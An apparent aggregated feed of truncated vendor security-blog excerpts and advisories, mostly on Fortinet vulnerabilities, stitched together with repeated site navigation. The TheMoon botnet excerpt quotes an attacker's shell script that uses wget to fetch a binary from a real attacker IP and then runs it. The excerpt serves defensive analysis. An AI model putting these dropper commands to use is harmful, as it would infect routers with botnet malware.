While monitoring the group, we managed to obtain an interesting
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
## Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen Sep 18, 2023 Read time: ( words)
Save to Folio
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca . Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
While monitoring the group, we managed to obtain an interest
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign | Fortinet Blog
blogs_fortinet·2023-06-12·CVSS 9.8
CVE-2023-27997 [CRITICAL] Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign | Fortinet Blog
PSIRT BLOGS
Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign
By Carl Windsor | June 12, 2023
Affected Platforms: FortiOS
Impacted Users: Targeted at government, manufacturing, and critical infrastructure
Impact: Data loss and OS and file corruption
Severity Level: Critical
Today, Fortinet published a CVSS Critical PSIRT Advisory (FG-IR-23-097 / CVE-2023-27997) along with several other SSL-VPN related fixes. This blog adds context to that advisory, providing our customers with additional details to help them make informed, risk-based decisions, and provides our perspective relative to recent events involving malicious actor activity.
The following write-up details our initial investigation into the incident that led to the discovery of this vulnerability and additi
Tenable
CVE-2023-27997: Heap-Based Buffer Overflow in Fortinet FortiOS and FortiProxy SSL-VPN (XORtigate)
blogs_tenable·2023-06-12·CVSS 9.8
[CRITICAL] CVE-2023-27997: Heap-Based Buffer Overflow in Fortinet FortiOS and FortiProxy SSL-VPN (XORtigate)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Mind the Gap: A Closer Look at Eight Notable CVEs from 2022
blogs_tenable·2023-05-09
Mind the Gap: A Closer Look at Eight Notable CVEs from 2022
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Perspectives: FortiNAC and CVE-2022-39952 | Fortinet Blog
blogs_fortinet·2023-02-23·CVSS 9.8
CVE-2022-39952 [CRITICAL] Perspectives: FortiNAC and CVE-2022-39952 | Fortinet Blog
PSIRT BLOGS
Perspectives: FortiNAC and CVE-2022-39952
By Carl Windsor | February 23, 2023
Affected Platforms: FortiNAC
Impacted Users: Execute unauthorized code or commands
Impact: Remote Code Execution
Severity Level: Critical
Fortinet published a Critical Advisory (FG-IR-22-300 / CVE-2022-39952) for FortiNAC on February 16, 2023. This blog adds perspective to that Advisory, providing our customers with additional, accurate details to help them make informed, risk-based decisions.
The Fortinet Product Security Incident Response Team (PSIRT) works diligently to identify bugs before code ships. Even with processes in place that put security at the forefront of the product development lifecycle and a commitment to deliver on the highest security assurance standard, vulnerabilities occur.
Fortinet
Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd | Fortinet Blog
blogs_fortinet·2023-01-11·CVSS 9.8
CVE-2022-42475 [CRITICAL] Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd | Fortinet Blog
PSIRT BLOGS
Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd
By Carl Windsor, Guillaume Lovet, Hongkei Chan, and Alex Kong | January 11, 2023
Affected Platforms: FortiOS
Impacted Users: Government & large organizations
Impact: Data loss and OS and file corruption
Severity Level: High
Fortinet has published CVSS: Critical advisory FG-IR-22-398 / CVE-2022-42475 on Dec 12, 2022. The following writeup details our initial investigation into this malware and additional IoCs identified during our ongoing analysis.
Executive Summary
Multiple additional IoCs have been uncovered related to the incident FG-IR-22-398 / CVE-2022-42475
The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets.
Incid
Qualys
Qualys Research Team: Threat Thursdays, October 2022
blogs_qualys·2022-10-28
Qualys Research Team: Threat Thursdays, October 2022
## Table of Contents
From the Qualys Blog
New Tools & Techniques
New Vulnerabilities
Noteworthy Mentions
Threat Thursdays Webinar
Welcome to the third edition of the Qualys Research Team’s “Threat Research Thursday”, where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. Feedback on our second edition, Qualys Threat Research Thursday , is more than welcome. We would love to hear from you!
## From the Qualys Blog
Here is a roundup of the most interesting blogs from the Qualys Research Team over the past couple of weeks:
Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform – How do you detect the ProxyNotShell vulnerability that was released a month a
Qualys
Qualys Research Team: Threat Thursdays, October 2022 | Qualys
blogs_qualys·2022-10-28·CVSS 7.8
[HIGH] Qualys Research Team: Threat Thursdays, October 2022 | Qualys
#### Table of Contents
- From the Qualys Blog
- New Tools & Techniques
- New Vulnerabilities
- Noteworthy Mentions
- Threat Thursdays Webinar
Welcome to the third edition of the Qualys Research Team’s “Threat Research Thursday”, where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. Feedback on our second edition, Qualys Threat Research Thursday, is more than welcome. We would love to hear from you!
## From the Qualys Blog
Here is a roundup of the most interesting blogs from the Qualys Research Team over the past couple of weeks:
- Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform – How do you detect the ProxyNotShell vulnerability that was released
Fortinet
Update Regarding CVE-2022-40684 | Fortinet Blog
blogs_fortinet·2022-10-14·CVSS 9.8
CVE-2022-40684 [CRITICAL] Update Regarding CVE-2022-40684 | Fortinet Blog
PSIRT BLOGS
Update Regarding CVE-2022-40684
By Carl Windsor | October 14, 2022
Fortinet recently distributed a PSIRT Advisory regarding CVE-2022-40684 that details urgent mitigation guidance, including upgrades as well as workarounds for customers and recommended next steps. The following update and considerations are part of our efforts to communicate the availability of patches and mitigations to address CVE-2022-40684 and also strongly urge potentially affected customers to immediately update their FortiOS, FortiProxy, and FortiSwitchManager products.
Timely and ongoing communications with our customers is a key component in our efforts to best protect their organization. Customer communications often detail the most up-to-date guidance and recommended next steps.
In this case, we w
Qualys
October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities With 13 Critical, Plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities With 17 Critical. | Qualys
blogs_qualys·2022-10-11·CVSS 7.8
[HIGH] October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities With 13 Critical, Plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities With 17 Critical. | Qualys
#### Table of Contents
- Microsoft Patch Tuesday Summary
- Microsoft Exchange ProxyNotShell Zero-Days Not Yet Addressed (QID 50122)
- The October 2022 Microsoft Vulnerabilities Are Classified As Follows:
- Two Zero-Day Vulnerabilities Addressed
- Microsoft Critical Vulnerability Highlights
- Microsoft Release Summary
- Microsoft Edge | Last But Not Least
- Adobe Security Bulletins and Advisories
- About Qualys Patch Tuesday
- Qualys Threat Research Blog Posts
- Qualys Threat Protection High-Rated Advisories
- Discover and Prioritize Vulnerabilities in Vulnerability Management Detection Response(VMDR)
- Rapid Response With Patch Management (PM)
- EXECUTE Mitigation Using Custom Assessment and Remediation (CAR)
- EVALUATE Vendor-Suggested Mitigation With Policy Compliance (PC)
- This Month
Qualys
October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities With 13 Critical, Plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities With 17 Critical.
blogs_qualys·2022-10-11·CVSS 7.8
[HIGH] October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities With 13 Critical, Plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities With 17 Critical.
## Table of Contents
Microsoft Patch Tuesday Summary
Microsoft Exchange ProxyNotShell Zero-Days Not Yet Addressed (QID 50122)
The October 2022 Microsoft Vulnerabilities Are Classified As Follows:
Two Zero-Day Vulnerabilities Addressed
Microsoft Critical Vulnerability Highlights
Microsoft Release Summary
Microsoft Edge | Last But Not Least
Adobe Security Bulletins and Advisories
About Qualys Patch Tuesday
Qualys Threat Research Blog Posts
Qualys Threat Protection High-Rated Advisories
Discover and Prioritize Vulnerabilities in Vulnerability Management Detection Response(VMDR)
Rapid Response With Patch Management (PM)
EXECUTE Mitigation Using Custom Assessment and Remediation (CAR)
EVALUATE Vendor-Suggested Mitigation With Policy Compliance (PC)
This Month in Vulnerabilities
Checkpoint
10th October – Threat Intelligence Report
blogs_checkpoint·2022-10-10
CVE-2022-41352 10th October – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 10th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th October, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
CommonSpirit Health, the second-largest nonprofit hospital chain in the U.S with 140 hospitals and over 1,000 facilities in 21 states, suffered a cybersecurity incident that disrupted medical services across the country. Facilities in Iowa, Nebraska, Tennessee and Washington were among those affected. The nature of the at
Tenable
CVE-2022-40684: Critical Authentication Bypass in FortiOS and FortiProxy
blogs_tenable·2022-10-07·CVSS 9.8
[CRITICAL] CVE-2022-40684: Critical Authentication Bypass in FortiOS and FortiProxy
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
From Follina to Rozena - Leveraging Discord to Distribute a Backdoor | FortiGuard Labs
blogs_fortinet·2022-07-06·CVSS 7.8
CVE-2022-30190 [HIGH] From Follina to Rozena - Leveraging Discord to Distribute a Backdoor | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
From Follina to Rozena - Leveraging Discord to Distribute a Backdoor
By Cara Lin | July 06, 2022
In May 2022, Microsoft published an advisory about CVE-2022-30190, which is about a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability. Attackers can inject a malicious external link to an OLE Object in a Microsoft Office document, then lure victims to click or simply preview the document in order to trigger this exploit. It will then execute a payload on the victim’s machine. Since this vulnerability is a public exploit and has high severity, FortiGuard Labs published an Outbreak Alert on 31st May and a blog article to address it on June 1, 2022.
During our tracking last month, we found a document that exploited CVE-2022-3019
Fortinet
Update Regarding CVE-2018-13379 | Fortinet
blogs_fortinet·2020-11-30·CVSS 9.1
CVE-2018-13379 [CRITICAL] Update Regarding CVE-2018-13379 | Fortinet
PSIRT BLOGS
Update Regarding CVE-2018-13379
By Carl Windsor | November 30, 2020
The security of our customers is our first priority. As part of our standard PSIRT process, upon an indication of an alleged vulnerability shared through responsible disclosure, Fortinet works hard to remediate those potential vulnerabilities and then communicates mitigation guidance. And, as a PSIRT team and forward-looking security vendor, we are constantly seeking ways to engage, educate, and encourage our customers to institute mitigation best practices and to patch their systems.
For example, in May 2019 Fortinet issued a PSIRT advisory regarding an SSL vulnerability that was resolved, and have also communicated directly with customers and again via corporate blog posts in August 2019 and July 2020 stro
Fortinet
Getting Ready for Swarm-as-a-Service
blogs_fortinet·2019-03-08
Getting Ready for Swarm-as-a-Service
INDUSTRY TRENDS & INSIGHTS
Getting Ready for Swarm-as-a-Service
By Derek Manky | March 08, 2019
This blog is a summary of an article written by Fortinet’s Derek Manky that appeared on the ThreatPost website on January 31, 2019.
The digital world has created unprecedented opportunities – both for good and for ill. Advances in swarm technology, for example, have powerful implications in the fields of medicine, transportation, engineering, and automated problem solving. However, if used maliciously, it may also be a game changer for the bad guys if organizations don’t update their security strategies.
For example, a new methodology reproduces natural swarm behaviors to control clusters of nano-robots, which can then be directed to perform precise structural changes with a high degree of r
Fortinet
The Analysis of Apache Struts 1 ActionServlet Validator Bypass (CVE-2016-1182)
blogs_fortinet·2017-10-25·CVSS 8.2
CVE-2016-1182 [HIGH] The Analysis of Apache Struts 1 ActionServlet Validator Bypass (CVE-2016-1182)
FORTIGUARD LABS THREAT RESEARCH
The Analysis of Apache Struts 1 ActionServlet Validator Bypass (CVE-2016-1182)
By Dehui Yin | October 25, 2017
Apache Struts 1 ValidatorForm is a commonly used component in the JAVA EE Web Application that requires validated form fields input by a user, such as a login form, registration form, or other information form. By configuring the validation rules, Apache Struts can validate many different kinds of fields - username, email, credit card number, etc. However, a bug in Apache Struts 1 can be used to manipulate the property of ValidatorForm so as to modify the validation rules, or even worse, cause a denial of service or execute arbitrary code in the context of the Web Application.
This potential Input Validation Bypass or Denial Of Service vulnerabil
Fortinet
TheMoon - A P2P botnet targeting Home Routers
blogs_fortinet·2016-10-20·CVSS 10.0
CVE-2014-9583 [CRITICAL] TheMoon - A P2P botnet targeting Home Routers
FORTIGUARD LABS THREAT RESEARCH
TheMoon - A P2P botnet targeting Home Routers
By Bing Liu | October 20, 2016
In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers.
The following figure shows attack traffic captured through Wireshark.
Figure 1 Exploitation of CVE-2014-9583
Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.
#!/bin/sh
cd /tmp
rm -f .nttpd
wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1
chmod +x .nttpd
./.nttpd
The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker controlled website. The following
Greynoiseio
Storm Watch
blogs_greynoiseio
Storm Watch
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
Fortinet CVE-2023-27997: Impact and Mitigation Techniques
blogs_recorded_future·CVSS 9.8
CVE-2023-27997 [CRITICAL] Fortinet CVE-2023-27997: Impact and Mitigation Techniques
## Fortinet CVE-2023-27997: Impact and Mitigation Techniques
On June 9th, Fortinet began distributing patches for a new critical vulnerability affecting Fortigate SSL VPN firewalls running on FortiOS or FortiProxy. While Fortinet has not yet released detailed information about the nature of the vulnerability, they have assigned a CVSSv3 score of 9.2 and classified it as an unauthenticated remote code execution (RCE) vulnerability based on a heap buffer overflow. Notably, even dual-factor authentication does not help in mitigating this vulnerability.
## Impact and affected versions
Over 200,000 Fortigate firewall instances are reachable from the internet, most likely vulnerable. Although there have been reports indicating that this CVE might have been exploited in a limited number of cas
Threat Intel
Belsen Group
threat_intel·CVSS 9.8
CVE-2022-40684 [CRITICAL] Belsen Group
# Threat Actor: Belsen Group
## Description
The Belsen Group has exploited the CVE-2022-40684 vulnerability in Fortinet devices to compromise over 15,000 FortiGate firewalls, releasing detailed configurations and plaintext VPN credentials. Their leaked data, organized by country and IP address, primarily consists of configurations from FortiOS 7.0.6 and 7.2.1, which were the last vulnerable versions before patches were issued. Security researcher Kevin Beaumont confirmed that the group leveraged this vulnerability to gain unauthorized access and warned of potential exploitation of CVE-2024-55591 by similar threat actors. Fortinet has stated that the leaked data originates from older campaigns and not from any recent incidents.
Greynoiseio
GreyNoise
blogs_greynoiseio·CVSS 9.8
[CRITICAL] GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
Fortinet CVE-2023-27997: Impact and Mitigation Techniques
blogs_recorded_future·CVSS 9.8
CVE-2023-27997 [CRITICAL] Fortinet CVE-2023-27997: Impact and Mitigation Techniques
# Fortinet CVE-2023-27997: Impact and Mitigation Techniques
On June 9th, Fortinet began distributing patches for a new critical vulnerability affecting Fortigate SSL VPN firewalls running on FortiOS or FortiProxy. While Fortinet has not yet released detailed information about the nature of the vulnerability, they have assigned a CVSSv3 score of 9.2 and classified it as an unauthenticated remote code execution (RCE) vulnerability based on a heap buffer overflow. Notably, even dual-factor authentication does not help in mitigating this vulnerability.
## Impact and affected versions
Over 200,000 Fortigate firewall instances are reachable from the internet, most likely vulnerable. Although there have been reports indicating that this CVE might have been exploited in a limited number of case
Huntress
Fortinet Vulnerability: Analysis, Detection, Removal | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] Fortinet Vulnerability: Analysis, Detection, Removal | Huntress
## Fortinet Vulnerability
Published: 12/05/2025
Written by: Lizzie Danielson
## What is Fortinet Vulnerability?
The Fortinet vulnerability refers to a critical security gap often identified within Fortinet cybersecurity products such as FortiGate devices or FortiOS platforms. This type of vulnerability may vary in nature, commonly encompassing Remote Code Execution (RCE), buffer overflow, or privilege escalation flaws. Such vulnerabilities enable attackers to exploit affected systems, potentially bypassing security defenses to execute arbitrary code, exfiltrate data, or take full control. These threats carry major implications for both businesses and individuals relying on Fortinet's products for protection.
## When was it discovered?
Fortinet vulnerabilities have been disclosed peri
http://packetstormsecurity.com/files/169431/Fortinet-FortiOS-FortiProxy-FortiSwitchManager-Authentication-Bypass.htmlhttp://packetstormsecurity.com/files/171515/Fortinet-7.2.1-Authentication-Bypass.htmlhttps://fortiguard.com/psirt/FG-IR-22-377http://packetstormsecurity.com/files/169431/Fortinet-FortiOS-FortiProxy-FortiSwitchManager-Authentication-Bypass.htmlhttp://packetstormsecurity.com/files/171515/Fortinet-7.2.1-Authentication-Bypass.htmlhttps://fortiguard.com/psirt/FG-IR-22-377https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-40684
2022-10-18
Published
2022-10-11
Added to CISA KEV
Exploited in the wild